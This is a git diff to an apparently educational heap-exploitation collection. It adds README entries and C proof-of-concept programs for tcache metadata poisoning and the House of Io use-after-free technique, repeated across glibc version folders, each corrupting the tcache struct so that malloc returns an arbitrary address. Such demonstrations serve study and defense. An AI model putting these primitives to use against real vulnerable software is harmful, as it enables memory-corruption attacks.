diff --git a/README.md b/README.md
index f55a59e..fa00a7b 100644
--- a/README.md
+++ b/README.md
@@ -41,6 +41,8 @@ We came up with the idea during a hack meeting, and have implemented the followi
| [decrypt_safe_linking.c](glibc_2.35/decrypt_safe_linking.c) | :arrow_forward: | Decrypt the poisoned value in linked list to recover the actual pointer | >= 2.32 | | |
| [safe_link_double_protect.c](glibc_2.36/safe_link_double_protect.c) | | Leakless bypass for PROTECT_PTR by protecting a pointer twice, allowing for arbitrary pointer linking in t-cache | >= 2.32 | | [37c3 Potluck - Tamagoyaki](https://github.com/UDPctf/CTF-challenges/tree/main/Potluck-CTF-2023/Tamagoyaki)|
| [tcache_dup.c](obsolete/glibc_2.27/tcache_dup.c)(obsolete) | | Tricking malloc into returning an already-allocated heap pointer by abusing the tcache freelist. | 2.26 - 2.28 | [patch](https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d) | |
+| [tcache_metadata_poisoning.c](glibc_2.27/tcache_metadata_poisoning.c) | | Trick the tcache into providing arbitrary pointers by manipulating the tcache metadata struct | >= 2.26 | | |
+| [house_of_io.c](glibc_2.31/house_of_io.c) | | Tricking malloc into return a pointer to arbitrary memory by manipulating the tcache management struct by UAF in a free'd tcache chunk. | 2.31 - 2.33 | | |
The GnuLibc is under constant development and several of the techniques above have let to consistency checks introduced in the malloc/free logic.
Consequently, these checks regularly break some of the techniques and require adjustments to bypass them (if possible).
diff --git a/glibc_2.27/tcache_metadata_poisoning.c b/glibc_2.27/tcache_metadata_poisoning.c
new file mode 100644
index 0000000..a48b5f2
--- /dev/null
+++ b/glibc_2.27/tcache_metadata_poisoning.c
@@ -0,0 +1,59 @@
+#include
+#include
+#include
+#include
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+ char counts[TCACHE_BINS];
+ void *entries[TCACHE_BINS];
+};
+
+int main() {
+ // Disable buffering
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ uint64_t stack_target = 0x1337;
+
+ puts("This example demonstrates what an attacker can achieve by controlling\n"
+ "the metadata chunk of the tcache.\n");
+ puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+ "will also serve as the relative offset to calculate the base of the\n"
+ "metadata chunk.");
+ uint64_t *victim = malloc(0x10);
+ printf("Victim chunk is at: %p.\n\n", victim);
+
+ long metadata_size = sizeof(struct tcache_metadata);
+ printf("Next we have to calculate the base address of the metadata struct.\n"
+ "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+ "have to subtract the header of the victim chunk (so an extra 0x10\n"
+ "bytes).\n",
+ sizeof(struct tcache_metadata));
+ struct tcache_metadata *metadata =
+ (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+ printf("The tcache metadata is located at %p.\n\n", metadata);
+
+ puts("Now we manipulate the metadata struct and insert the target address\n"
+ "in a chunk. Here we choose the second tcache bin.\n");
+ metadata->counts[1] = 1;
+ metadata->entries[1] = &stack_target;
+
+ uint64_t *evil = malloc(0x20);
+ printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+ "second tcache bin. The returned pointer is %p.\n",
+ evil);
+ assert(evil == &stack_target);
+}
diff --git a/glibc_2.31/house_of_io.c b/glibc_2.31/house_of_io.c
new file mode 100644
index 0000000..6d5f87e
--- /dev/null
+++ b/glibc_2.31/house_of_io.c
@@ -0,0 +1,104 @@
+#include
+#include
+#include
+#include
+#include
+
+// House of Io - Use after free Variant
+// ====================================
+//
+// Source: https://awaraucom.wordpress.com/2020/07/19/house-of-io-remastered/
+//
+// Tested on libc versions 2.31, 2.32 and 2.33.
+//
+// House of Io makes use of the fact, that when freeing a chunk into the tcache
+// the chunk will receive a pointer to the tcache management struct which has
+// been allocated beforehand. This pointer is the tcache->key entry of a free'd
+// tcache chunk. There are three different versions of this attack and all work
+// even with safe-link enabled, as the tcache-key pointer, and more importantly
+// the pointers in the tcache_perthread_struct, are not protected.
+//
+// House of Io only works in libc versions 2.29 - 2.33, because in these
+// versions the key of a tcache entry is the pointer to the tcache management
+// struct. This can allow an attacker to carry out a tcache_metadata_poisoning
+// attack.
+//
+// However the exploit primitives are very constrained as stated in the source.
+// Negative overflows are very rare and so is the needed order of specific frees
+// for the double free variant. This use after free is a bit more realistic.
+
+unsigned long global_var = 1;
+
+struct overlay {
+ uint64_t *next;
+ uint64_t *key;
+};
+
+struct tcache_perthread_struct {
+ uint16_t counts[64];
+ uint64_t entries[64];
+};
+
+int main() {
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ puts("In house of Io we make use of the fact, that a free'd tcache chunk\n"
+ "gets a pointer to the tcache management struct inserted at the\n"
+ "second slot.\n");
+
+ puts(
+ "This variant is the use-after-free variant and can be used, if the\n"
+ "free'd struct has a pointer at offset +0x08, which can be read from\n"
+ "and written to. This pointer will be the tcache->key entry of the\n"
+ "free'd chunk, which contains a pointer to the tcache management\n"
+ "struct. If we use that pointer we can manipulate the tcache management\n"
+ "struct into returning an arbitrary pointer.\n");
+
+ printf("Specifically we get a pointer to the `global_var` at %p returned to\n"
+ "us from malloc.\n\n",
+ &global_var);
+
+ puts("First we have to allocate a struct, that has a pointer at offset\n"
+ "+0x08.\n");
+ struct overlay *ptr = malloc(sizeof(struct overlay));
+
+ ptr->next = malloc(0x10);
+ ptr->key = malloc(0x10);
+
+ puts("Then we immedietly free that struct to get a pointer to the tcache\n"
+ "management struct.\n");
+ free(ptr);
+
+ printf("The tcache struct is located at %p.\n\n", ptr->key);
+ struct tcache_perthread_struct *management_struct =
+ (struct tcache_perthread_struct *)ptr->key;
+
+ puts(
+ "Now that we have a pointer to the management struct we can manipulate\n"
+ "its values. First we potentially have to increase the counter of the\n"
+ "first bin by to a number higher than zero, to make the tcache think we\n"
+ "free'd at least one chunk. In our case this is not necesarry because\n"
+ "the `overlay` struct fits in the first bin and we have free'd that\n"
+ "already. The firest member of the tcache_perthread_struct is the array\n"
+ "of counters. So by overwriting the first element of our pointer we set\n"
+ "the correct value in the array.\n");
+ management_struct->counts[0] = 1;
+
+ printf("Before we overwrite the pointer in the tcache bin, the bin contains\n"
+ "[ %p ]. This is the same as the free'd overlay struct which we\n"
+ "created at the start [ %p == %p ].\n\n",
+ management_struct->entries[0], management_struct->entries[0], ptr);
+ management_struct->entries[0] = (uint64_t)&global_var;
+ printf(
+ "After the write we have placed a pointer to the global variable into\n"
+ "the tcache [ %p ].\n\n",
+ management_struct->entries[0]);
+
+ puts("If we now allocate a new chunk from that tcache bin we get a pointer\n"
+ "to our target location.\n");
+ uint64_t *evil_chunk = malloc(0x10);
+
+ assert(evil_chunk == &global_var);
+ return 0;
+}
diff --git a/glibc_2.31/tcache_metadata_poisoning.c b/glibc_2.31/tcache_metadata_poisoning.c
new file mode 100644
index 0000000..356debc
--- /dev/null
+++ b/glibc_2.31/tcache_metadata_poisoning.c
@@ -0,0 +1,59 @@
+#include
+#include
+#include
+#include
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+ uint16_t counts[TCACHE_BINS];
+ void *entries[TCACHE_BINS];
+};
+
+int main() {
+ // Disable buffering
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ uint64_t stack_target = 0x1337;
+
+ puts("This example demonstrates what an attacker can achieve by controlling\n"
+ "the metadata chunk of the tcache.\n");
+ puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+ "will also serve as the relative offset to calculate the base of the\n"
+ "metadata chunk.");
+ uint64_t *victim = malloc(0x10);
+ printf("Victim chunk is at: %p.\n\n", victim);
+
+ long metadata_size = sizeof(struct tcache_metadata);
+ printf("Next we have to calculate the base address of the metadata struct.\n"
+ "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+ "have to subtract the header of the victim chunk (so an extra 0x10\n"
+ "bytes).\n",
+ sizeof(struct tcache_metadata));
+ struct tcache_metadata *metadata =
+ (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+ printf("The tcache metadata is located at %p.\n\n", metadata);
+
+ puts("Now we manipulate the metadata struct and insert the target address\n"
+ "in a chunk. Here we choose the second tcache bin.\n");
+ metadata->counts[1] = 1;
+ metadata->entries[1] = &stack_target;
+
+ uint64_t *evil = malloc(0x20);
+ printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+ "second tcache bin. The returned pointer is %p.\n",
+ evil);
+ assert(evil == &stack_target);
+}
diff --git a/glibc_2.32/house_of_io.c b/glibc_2.32/house_of_io.c
new file mode 100644
index 0000000..6d5f87e
--- /dev/null
+++ b/glibc_2.32/house_of_io.c
@@ -0,0 +1,104 @@
+#include
+#include
+#include
+#include
+#include
+
+// House of Io - Use after free Variant
+// ====================================
+//
+// Source: https://awaraucom.wordpress.com/2020/07/19/house-of-io-remastered/
+//
+// Tested on libc versions 2.31, 2.32 and 2.33.
+//
+// House of Io makes use of the fact, that when freeing a chunk into the tcache
+// the chunk will receive a pointer to the tcache management struct which has
+// been allocated beforehand. This pointer is the tcache->key entry of a free'd
+// tcache chunk. There are three different versions of this attack and all work
+// even with safe-link enabled, as the tcache-key pointer, and more importantly
+// the pointers in the tcache_perthread_struct, are not protected.
+//
+// House of Io only works in libc versions 2.29 - 2.33, because in these
+// versions the key of a tcache entry is the pointer to the tcache management
+// struct. This can allow an attacker to carry out a tcache_metadata_poisoning
+// attack.
+//
+// However the exploit primitives are very constrained as stated in the source.
+// Negative overflows are very rare and so is the needed order of specific frees
+// for the double free variant. This use after free is a bit more realistic.
+
+unsigned long global_var = 1;
+
+struct overlay {
+ uint64_t *next;
+ uint64_t *key;
+};
+
+struct tcache_perthread_struct {
+ uint16_t counts[64];
+ uint64_t entries[64];
+};
+
+int main() {
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ puts("In house of Io we make use of the fact, that a free'd tcache chunk\n"
+ "gets a pointer to the tcache management struct inserted at the\n"
+ "second slot.\n");
+
+ puts(
+ "This variant is the use-after-free variant and can be used, if the\n"
+ "free'd struct has a pointer at offset +0x08, which can be read from\n"
+ "and written to. This pointer will be the tcache->key entry of the\n"
+ "free'd chunk, which contains a pointer to the tcache management\n"
+ "struct. If we use that pointer we can manipulate the tcache management\n"
+ "struct into returning an arbitrary pointer.\n");
+
+ printf("Specifically we get a pointer to the `global_var` at %p returned to\n"
+ "us from malloc.\n\n",
+ &global_var);
+
+ puts("First we have to allocate a struct, that has a pointer at offset\n"
+ "+0x08.\n");
+ struct overlay *ptr = malloc(sizeof(struct overlay));
+
+ ptr->next = malloc(0x10);
+ ptr->key = malloc(0x10);
+
+ puts("Then we immedietly free that struct to get a pointer to the tcache\n"
+ "management struct.\n");
+ free(ptr);
+
+ printf("The tcache struct is located at %p.\n\n", ptr->key);
+ struct tcache_perthread_struct *management_struct =
+ (struct tcache_perthread_struct *)ptr->key;
+
+ puts(
+ "Now that we have a pointer to the management struct we can manipulate\n"
+ "its values. First we potentially have to increase the counter of the\n"
+ "first bin by to a number higher than zero, to make the tcache think we\n"
+ "free'd at least one chunk. In our case this is not necesarry because\n"
+ "the `overlay` struct fits in the first bin and we have free'd that\n"
+ "already. The firest member of the tcache_perthread_struct is the array\n"
+ "of counters. So by overwriting the first element of our pointer we set\n"
+ "the correct value in the array.\n");
+ management_struct->counts[0] = 1;
+
+ printf("Before we overwrite the pointer in the tcache bin, the bin contains\n"
+ "[ %p ]. This is the same as the free'd overlay struct which we\n"
+ "created at the start [ %p == %p ].\n\n",
+ management_struct->entries[0], management_struct->entries[0], ptr);
+ management_struct->entries[0] = (uint64_t)&global_var;
+ printf(
+ "After the write we have placed a pointer to the global variable into\n"
+ "the tcache [ %p ].\n\n",
+ management_struct->entries[0]);
+
+ puts("If we now allocate a new chunk from that tcache bin we get a pointer\n"
+ "to our target location.\n");
+ uint64_t *evil_chunk = malloc(0x10);
+
+ assert(evil_chunk == &global_var);
+ return 0;
+}
diff --git a/glibc_2.32/tcache_metadata_poisoning.c b/glibc_2.32/tcache_metadata_poisoning.c
new file mode 100644
index 0000000..356debc
--- /dev/null
+++ b/glibc_2.32/tcache_metadata_poisoning.c
@@ -0,0 +1,59 @@
+#include
+#include
+#include
+#include
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+ uint16_t counts[TCACHE_BINS];
+ void *entries[TCACHE_BINS];
+};
+
+int main() {
+ // Disable buffering
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ uint64_t stack_target = 0x1337;
+
+ puts("This example demonstrates what an attacker can achieve by controlling\n"
+ "the metadata chunk of the tcache.\n");
+ puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+ "will also serve as the relative offset to calculate the base of the\n"
+ "metadata chunk.");
+ uint64_t *victim = malloc(0x10);
+ printf("Victim chunk is at: %p.\n\n", victim);
+
+ long metadata_size = sizeof(struct tcache_metadata);
+ printf("Next we have to calculate the base address of the metadata struct.\n"
+ "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+ "have to subtract the header of the victim chunk (so an extra 0x10\n"
+ "bytes).\n",
+ sizeof(struct tcache_metadata));
+ struct tcache_metadata *metadata =
+ (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+ printf("The tcache metadata is located at %p.\n\n", metadata);
+
+ puts("Now we manipulate the metadata struct and insert the target address\n"
+ "in a chunk. Here we choose the second tcache bin.\n");
+ metadata->counts[1] = 1;
+ metadata->entries[1] = &stack_target;
+
+ uint64_t *evil = malloc(0x20);
+ printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+ "second tcache bin. The returned pointer is %p.\n",
+ evil);
+ assert(evil == &stack_target);
+}
diff --git a/glibc_2.33/house_of_io.c b/glibc_2.33/house_of_io.c
new file mode 100644
index 0000000..6d5f87e
--- /dev/null
+++ b/glibc_2.33/house_of_io.c
@@ -0,0 +1,104 @@
+#include
+#include
+#include
+#include
+#include
+
+// House of Io - Use after free Variant
+// ====================================
+//
+// Source: https://awaraucom.wordpress.com/2020/07/19/house-of-io-remastered/
+//
+// Tested on libc versions 2.31, 2.32 and 2.33.
+//
+// House of Io makes use of the fact, that when freeing a chunk into the tcache
+// the chunk will receive a pointer to the tcache management struct which has
+// been allocated beforehand. This pointer is the tcache->key entry of a free'd
+// tcache chunk. There are three different versions of this attack and all work
+// even with safe-link enabled, as the tcache-key pointer, and more importantly
+// the pointers in the tcache_perthread_struct, are not protected.
+//
+// House of Io only works in libc versions 2.29 - 2.33, because in these
+// versions the key of a tcache entry is the pointer to the tcache management
+// struct. This can allow an attacker to carry out a tcache_metadata_poisoning
+// attack.
+//
+// However the exploit primitives are very constrained as stated in the source.
+// Negative overflows are very rare and so is the needed order of specific frees
+// for the double free variant. This use after free is a bit more realistic.
+
+unsigned long global_var = 1;
+
+struct overlay {
+ uint64_t *next;
+ uint64_t *key;
+};
+
+struct tcache_perthread_struct {
+ uint16_t counts[64];
+ uint64_t entries[64];
+};
+
+int main() {
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ puts("In house of Io we make use of the fact, that a free'd tcache chunk\n"
+ "gets a pointer to the tcache management struct inserted at the\n"
+ "second slot.\n");
+
+ puts(
+ "This variant is the use-after-free variant and can be used, if the\n"
+ "free'd struct has a pointer at offset +0x08, which can be read from\n"
+ "and written to. This pointer will be the tcache->key entry of the\n"
+ "free'd chunk, which contains a pointer to the tcache management\n"
+ "struct. If we use that pointer we can manipulate the tcache management\n"
+ "struct into returning an arbitrary pointer.\n");
+
+ printf("Specifically we get a pointer to the `global_var` at %p returned to\n"
+ "us from malloc.\n\n",
+ &global_var);
+
+ puts("First we have to allocate a struct, that has a pointer at offset\n"
+ "+0x08.\n");
+ struct overlay *ptr = malloc(sizeof(struct overlay));
+
+ ptr->next = malloc(0x10);
+ ptr->key = malloc(0x10);
+
+ puts("Then we immedietly free that struct to get a pointer to the tcache\n"
+ "management struct.\n");
+ free(ptr);
+
+ printf("The tcache struct is located at %p.\n\n", ptr->key);
+ struct tcache_perthread_struct *management_struct =
+ (struct tcache_perthread_struct *)ptr->key;
+
+ puts(
+ "Now that we have a pointer to the management struct we can manipulate\n"
+ "its values. First we potentially have to increase the counter of the\n"
+ "first bin by to a number higher than zero, to make the tcache think we\n"
+ "free'd at least one chunk. In our case this is not necesarry because\n"
+ "the `overlay` struct fits in the first bin and we have free'd that\n"
+ "already. The firest member of the tcache_perthread_struct is the array\n"
+ "of counters. So by overwriting the first element of our pointer we set\n"
+ "the correct value in the array.\n");
+ management_struct->counts[0] = 1;
+
+ printf("Before we overwrite the pointer in the tcache bin, the bin contains\n"
+ "[ %p ]. This is the same as the free'd overlay struct which we\n"
+ "created at the start [ %p == %p ].\n\n",
+ management_struct->entries[0], management_struct->entries[0], ptr);
+ management_struct->entries[0] = (uint64_t)&global_var;
+ printf(
+ "After the write we have placed a pointer to the global variable into\n"
+ "the tcache [ %p ].\n\n",
+ management_struct->entries[0]);
+
+ puts("If we now allocate a new chunk from that tcache bin we get a pointer\n"
+ "to our target location.\n");
+ uint64_t *evil_chunk = malloc(0x10);
+
+ assert(evil_chunk == &global_var);
+ return 0;
+}
diff --git a/glibc_2.33/tcache_metadata_poisoning.c b/glibc_2.33/tcache_metadata_poisoning.c
new file mode 100644
index 0000000..356debc
--- /dev/null
+++ b/glibc_2.33/tcache_metadata_poisoning.c
@@ -0,0 +1,59 @@
+#include
+#include
+#include
+#include
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+ uint16_t counts[TCACHE_BINS];
+ void *entries[TCACHE_BINS];
+};
+
+int main() {
+ // Disable buffering
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ uint64_t stack_target = 0x1337;
+
+ puts("This example demonstrates what an attacker can achieve by controlling\n"
+ "the metadata chunk of the tcache.\n");
+ puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+ "will also serve as the relative offset to calculate the base of the\n"
+ "metadata chunk.");
+ uint64_t *victim = malloc(0x10);
+ printf("Victim chunk is at: %p.\n\n", victim);
+
+ long metadata_size = sizeof(struct tcache_metadata);
+ printf("Next we have to calculate the base address of the metadata struct.\n"
+ "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+ "have to subtract the header of the victim chunk (so an extra 0x10\n"
+ "bytes).\n",
+ sizeof(struct tcache_metadata));
+ struct tcache_metadata *metadata =
+ (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+ printf("The tcache metadata is located at %p.\n\n", metadata);
+
+ puts("Now we manipulate the metadata struct and insert the target address\n"
+ "in a chunk. Here we choose the second tcache bin.\n");
+ metadata->counts[1] = 1;
+ metadata->entries[1] = &stack_target;
+
+ uint64_t *evil = malloc(0x20);
+ printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+ "second tcache bin. The returned pointer is %p.\n",
+ evil);
+ assert(evil == &stack_target);
+}
diff --git a/glibc_2.34/tcache_metadata_poisoning.c b/glibc_2.34/tcache_metadata_poisoning.c
new file mode 100644
index 0000000..356debc
--- /dev/null
+++ b/glibc_2.34/tcache_metadata_poisoning.c
@@ -0,0 +1,59 @@
+#include
+#include
+#include
+#include
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+ uint16_t counts[TCACHE_BINS];
+ void *entries[TCACHE_BINS];
+};
+
+int main() {
+ // Disable buffering
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ uint64_t stack_target = 0x1337;
+
+ puts("This example demonstrates what an attacker can achieve by controlling\n"
+ "the metadata chunk of the tcache.\n");
+ puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+ "will also serve as the relative offset to calculate the base of the\n"
+ "metadata chunk.");
+ uint64_t *victim = malloc(0x10);
+ printf("Victim chunk is at: %p.\n\n", victim);
+
+ long metadata_size = sizeof(struct tcache_metadata);
+ printf("Next we have to calculate the base address of the metadata struct.\n"
+ "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+ "have to subtract the header of the victim chunk (so an extra 0x10\n"
+ "bytes).\n",
+ sizeof(struct tcache_metadata));
+ struct tcache_metadata *metadata =
+ (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+ printf("The tcache metadata is located at %p.\n\n", metadata);
+
+ puts("Now we manipulate the metadata struct and insert the target address\n"
+ "in a chunk. Here we choose the second tcache bin.\n");
+ metadata->counts[1] = 1;
+ metadata->entries[1] = &stack_target;
+
+ uint64_t *evil = malloc(0x20);
+ printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+ "second tcache bin. The returned pointer is %p.\n",
+ evil);
+ assert(evil == &stack_target);
+}
diff --git a/glibc_2.35/tcache_metadata_poisoning.c b/glibc_2.35/tcache_metadata_poisoning.c
new file mode 100644
index 0000000..356debc
--- /dev/null
+++ b/glibc_2.35/tcache_metadata_poisoning.c
@@ -0,0 +1,59 @@
+#include
+#include
+#include
+#include
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+ uint16_t counts[TCACHE_BINS];
+ void *entries[TCACHE_BINS];
+};
+
+int main() {
+ // Disable buffering
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ uint64_t stack_target = 0x1337;
+
+ puts("This example demonstrates what an attacker can achieve by controlling\n"
+ "the metadata chunk of the tcache.\n");
+ puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+ "will also serve as the relative offset to calculate the base of the\n"
+ "metadata chunk.");
+ uint64_t *victim = malloc(0x10);
+ printf("Victim chunk is at: %p.\n\n", victim);
+
+ long metadata_size = sizeof(struct tcache_metadata);
+ printf("Next we have to calculate the base address of the metadata struct.\n"
+ "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+ "have to subtract the header of the victim chunk (so an extra 0x10\n"
+ "bytes).\n",
+ sizeof(struct tcache_metadata));
+ struct tcache_metadata *metadata =
+ (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+ printf("The tcache metadata is located at %p.\n\n", metadata);
+
+ puts("Now we manipulate the metadata struct and insert the target address\n"
+ "in a chunk. Here we choose the second tcache bin.\n");
+ metadata->counts[1] = 1;
+ metadata->entries[1] = &stack_target;
+
+ uint64_t *evil = malloc(0x20);
+ printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+ "second tcache bin. The returned pointer is %p.\n",
+ evil);
+ assert(evil == &stack_target);
+}
diff --git a/glibc_2.36/tcache_metadata_poisoning.c b/glibc_2.36/tcache_metadata_poisoning.c
new file mode 100644
index 0000000..356debc
--- /dev/null
+++ b/glibc_2.36/tcache_metadata_poisoning.c
@@ -0,0 +1,59 @@
+#include
+#include
+#include
+#include
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+ uint16_t counts[TCACHE_BINS];
+ void *entries[TCACHE_BINS];
+};
+
+int main() {
+ // Disable buffering
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ uint64_t stack_target = 0x1337;
+
+ puts("This example demonstrates what an attacker can achieve by controlling\n"
+ "the metadata chunk of the tcache.\n");
+ puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+ "will also serve as the relative offset to calculate the base of the\n"
+ "metadata chunk.");
+ uint64_t *victim = malloc(0x10);
+ printf("Victim chunk is at: %p.\n\n", victim);
+
+ long metadata_size = sizeof(struct tcache_metadata);
+ printf("Next we have to calculate the base address of the metadata struct.\n"
+ "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+ "have to subtract the header of the victim chunk (so an extra 0x10\n"
+ "bytes).\n",
+ sizeof(struct tcache_metadata));
+ struct tcache_metadata *metadata =
+ (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+ printf("The tcache metadata is located at %p.\n\n", metadata);
+
+ puts("Now we manipulate the metadata struct and insert the target address\n"
+ "in a chunk. Here we choose the second tcache bin.\n");
+ metadata->counts[1] = 1;
+ metadata->entries[1] = &stack_target;
+
+ uint64_t *evil = malloc(0x20);
+ printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+ "second tcache bin. The returned pointer is %p.\n",
+ evil);
+ assert(evil == &stack_target);
+}
diff --git a/glibc_2.37/tcache_metadata_poisoning.c b/glibc_2.37/tcache_metadata_poisoning.c
new file mode 100644
index 0000000..356debc
--- /dev/null
+++ b/glibc_2.37/tcache_metadata_poisoning.c
@@ -0,0 +1,59 @@
+#include
+#include
+#include
+#include
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+ uint16_t counts[TCACHE_BINS];
+ void *entries[TCACHE_BINS];
+};
+
+int main() {
+ // Disable buffering
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ uint64_t stack_target = 0x1337;
+
+ puts("This example demonstrates what an attacker can achieve by controlling\n"
+ "the metadata chunk of the tcache.\n");
+ puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+ "will also serve as the relative offset to calculate the base of the\n"
+ "metadata chunk.");
+ uint64_t *victim = malloc(0x10);
+ printf("Victim chunk is at: %p.\n\n", victim);
+
+ long metadata_size = sizeof(struct tcache_metadata);
+ printf("Next we have to calculate the base address of the metadata struct.\n"
+ "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+ "have to subtract the header of the victim chunk (so an extra 0x10\n"
+ "bytes).\n",
+ sizeof(struct tcache_metadata));
+ struct tcache_metadata *metadata =
+ (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+ printf("The tcache metadata is located at %p.\n\n", metadata);
+
+ puts("Now we manipulate the metadata struct and insert the target address\n"
+ "in a chunk. Here we choose the second tcache bin.\n");
+ metadata->counts[1] = 1;
+ metadata->entries[1] = &stack_target;
+
+ uint64_t *evil = malloc(0x20);
+ printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+ "second tcache bin. The returned pointer is %p.\n",
+ evil);
+ assert(evil == &stack_target);
+}
diff --git a/glibc_2.38/tcache_metadata_poisoning.c b/glibc_2.38/tcache_metadata_poisoning.c
new file mode 100644
index 0000000..356debc
--- /dev/null
+++ b/glibc_2.38/tcache_metadata_poisoning.c
@@ -0,0 +1,59 @@
+#include
+#include
+#include
+#include
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+ uint16_t counts[TCACHE_BINS];
+ void *entries[TCACHE_BINS];
+};
+
+int main() {
+ // Disable buffering
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ uint64_t stack_target = 0x1337;
+
+ puts("This example demonstrates what an attacker can achieve by controlling\n"
+ "the metadata chunk of the tcache.\n");
+ puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+ "will also serve as the relative offset to calculate the base of the\n"
